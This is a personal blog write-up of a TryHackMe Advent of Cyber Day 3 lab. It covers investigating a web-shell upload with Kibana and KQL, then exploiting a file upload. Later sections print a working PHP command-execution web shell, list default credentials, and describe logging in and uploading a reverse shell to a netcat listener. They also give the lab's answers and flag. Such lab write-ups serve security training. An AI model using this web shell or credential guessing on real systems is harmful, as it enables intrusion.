The Story

Late one Christmas evening the Glitch had a feeling,
Something forgotten as he stared at the ceiling.
He got up out of bed and decided to check,
A note on his wall: ”Two days! InsnowSec”.

With a click and a type he got his hotel and tickets,
And sank off to sleep to the sound of some crickets.
Luggage in hand, he had arrived at Frosty Pines,
“To get to the conference, just follow the signs”.

Just as he was ready the Glitch got a fright,
An RCE vulnerability on their website ?!?
He exploited it quick and made a report,
But before he could send arrived his transport.

In the Frosty Pines SOC they saw an alert,
This looked quite bad, they called an expert.
The request came from a room, but they couldn’t tell which,
The logs saved the day, it was the room of…the Glitch

In this task, we will gain access to the website.

learning objectives

log analysis and tools like ELK
learn about KQL and how to use to investigate logs using ELK
learn about RCE and how to do via insecure file upload

Connecting to the machine

Log analysis & Intro to ELK

Using ELK

load URL http://10.10.227.129:5601/
we use Kibana to review apache2 logs
we go to menu > Discover
We then change the collection filter to wareville-rails
we then set start time to October 1 2024 00:00:00 and end time to October 1 23:30:00
In the Kibana there are important parts to make note of

Search bar, can be used to search using KQL queries
Index pattern, index pattern is a collection of logs, can be from specific host or, for example, multiple hosts with a similar purpose
Fields, shows us the fields that elastic search has parsed from the logs e.g timestampts, etc
Timeline, the visualization displays the event count over a period of time
Documents (Logs), entries are the specific entries in the log file
Time filter, can be used to narrow down a specific time frame, alternatively can use relativitity (Last 15 minutes, etc)

Kibana Query Language (KQL)

easy-to-use
can be used to search documents for values
Kibana as an alternative also allows using Lucene query which supports fuzzy terms e.g regexes, etc

query/syntax	desc	example
""	two quote marks are used to search for specific value within docs	"TryHackMe"
	denotes wildcard, searches documents for similar matches to the value provided	United*
OR	logical operator OR	"UK" or "US"
AND	logical operator AND	"Ben" and "10"
:	used to search specific field of a document for a value, such as ip address, (note it depends on the available fields in the index pattern)	ip.address: 10.10.10.10

Investigating a web attack with ELK

Scenario: thanks to extensive intrusion detection capabilities, our systems alerted the SOC team to a web shell being uploaded to the Wareville rails booking platform on Oct 1 2024. Our task is to review the webserver logs to determine how the attacker achieved this.

on the logs we see that shell.php was uploaded
we can quickly find this if we browse through the messages and see it manually
or we can filter via message: shell.php

OPERATION RED

we check how red or the attack itself was carried out

Why do websites allow file uploads?

it's everywhere on websites, and for good reason.
Users often need to upload files like profile pictures, invoices, etc

these make ux smoother and more efficient
while convenient it creates risk if file uploads aren't handled properly

File upload vulnerabilities

RCE, uploading a script that server runs gives the attacker control over it
XSS, uploading an HTML file that contains an XSS code which will steal a cookie and send it back to the attacker's server

Why unrestricted file uploads are dangerous

allwo attacker to upload any file type
if files contents aren't properly validated, attacker could upload malicious scripts
examples

uploading a script that server executes, leading to RCE
uploading a crafted image that triggers vulnerability when processed by server
uploading a web shell and browsing to it directly using a browser

Usage of weak credentials

easiest way for attackers to break into systems is through weak or default cerds,
can be open door for attackers to gain unauthorized access
default creds are often found in systems where administrators fail to change initial login details provided during set up
common weak creds

admin/admin
administrator/administrator
admin@dommainname/admin
guest/guest

RCE

WebShell

Exploiting RCE via File upload

below is example php file to exploit a theoretical vulnerability

<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="text" name="command" autofocus id="command" size="50">
<input type="submit" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['command'])) 
    {
        system($_GET['command'] . ' 2>&1'); 
    }
?>
</pre>
</body>
</html>

above script, when accessed, displays an input field, whatever is entered is run against the underlying operating system using the system() php function

Practical

work on frostypines.thm

Question and Answers:

BLUE: Where was the web shell uploaded to? Answer format: /directory/directory/directory/filename.php

/media/images/rooms/shell.php

BLUE: What IP address accessed the web shell?

10.11.83.34

What is the contents of the flag.txt?

to get the answer we attempted to use common admin passwords using admin@domain/admin format
we tried using the /shell.php but it seems it doesn't work, I saw a video where it worked
didn't work so have to find a different way
tried to login and upload own shell I got from pentestmonkey and modified the ip and port pointing to my ready nc -lvnp 4444
then had to call /media/images/rooms/myshell.php so that it connects to my ready netcat
after it triggered it gave me the shell I needed
flag was

THM{Gl1tch_Was_H3r3}

Search This Blog

Jojo Narte's Journal

THM: Advent of Cyber Day 3 Personal notes